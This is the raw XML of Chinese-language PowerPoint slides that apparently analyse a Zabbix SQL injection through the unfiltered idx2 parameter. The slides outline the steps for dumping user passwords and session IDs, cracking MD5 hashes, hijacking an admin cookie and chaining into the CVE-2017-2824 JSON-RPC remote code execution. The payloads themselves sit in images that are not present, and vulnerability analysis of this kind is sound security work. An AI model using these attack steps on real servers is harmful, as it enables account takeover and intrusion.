            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>self::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>insertDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>self::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>insertDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中未对用户传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>profileIdx2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>参数进行任何检查直接带入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>查询中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>从而造成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入。如下所示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9A760955-ACBE-440D-963A-3FFFC4BA5B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019799" y="563908"/>
            <a:ext cx="4875213" cy="3318151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{96CCC186-910F-4DD9-822D-93A1EEA43937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172203" y="4226851"/>
            <a:ext cx="4466730" cy="2116937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7044047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AB3EC51-A0A5-4008-985F-CA3BB47A7154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1D82C824-9AFD-4F32-B453-CDFA82970CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141410" y="2249486"/>
            <a:ext cx="4878389" cy="4323592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zbx_dbstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>实际上就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，会对单引号、双引号等特殊字符做转义，但是代码并没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idx2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>参数做过滤。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>insertDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>db.inc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>499</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DBexecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>也没有进行过滤，直接执行：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所以可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idx2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>参数，攻击者可以通过进一步构造语句进行错误型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入，无需获取和破解加密的管理员密码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>有经验的攻击者可以直接通过获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>来根据结构算法构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>直接以管理员身份登陆。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DAC8B693-21DF-4B9C-9E0E-93318E617621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172198" y="2249486"/>
            <a:ext cx="4875213" cy="1906098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D2445109-8986-492C-AE4C-54552B2C1CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172198" y="4370930"/>
            <a:ext cx="4596130" cy="1392555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17073892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94F6622-2066-4B65-864D-7DF80E94D9DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B555D0D3-0780-4B94-B0A6-127951F3F583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>首先将在浏览器中输入以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>不会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idx2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的内容进行过滤，直接执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>语句，因为这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>语句并不存在所以会执行出错进而返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D8DDAC81-9046-4638-8813-F9C2ABFCCB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248399" y="1018207"/>
            <a:ext cx="4875213" cy="1534493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{95771DDF-248D-46C6-B1F3-07E5C777445F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248399" y="2836583"/>
            <a:ext cx="5270500" cy="1783715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244600" y="4836558"/>
            <a:ext cx="5803900" cy="1107040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16362755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33E472B-8670-4A61-B3FA-E4613595D77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="268085"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{05F2679D-C80D-4348-9D32-B415887B0D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027485" y="1558751"/>
            <a:ext cx="4878389" cy="3740497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用如下所示的语句构造错误型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>语句，根据查询的内容不同可以返回：操作系统版本、数据库名称和数据库的内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在分析了数据库的表结构以后，猜想</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的密码信息在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表中，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表进行查询可以得到密码信息，同样的对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表查询也可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>session_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CB2B5EB5-2281-4122-B373-5A4964D80590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6039830" y="1279679"/>
            <a:ext cx="4875213" cy="286333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{90770086-22D3-4B73-86F8-40B4E0DCA23C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286128" y="1991206"/>
            <a:ext cx="3984625" cy="3587115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A0D58743-1BC7-4930-B884-371F97A68537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131466" y="5354611"/>
            <a:ext cx="4670425" cy="699770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31724722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CFBD052-3467-4981-AD5F-E6AAFFCEACFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3F779755-00AF-4429-8CD7-109E3113E1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法进行解密得到用户的密码信息：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>得到用户的密码信息以后，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>api_jsonrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的任意代码执行漏洞可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1ABD2187-D879-42AF-ABD4-45610EFA79CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094412" y="2097088"/>
            <a:ext cx="4875213" cy="1124491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21171458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0CBA8FF-36CE-42B5-8F6C-94E8E006301F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zabbix 2.2 &lt; 3.0.3 - RCE with API JSON-RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE-2017-2824</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
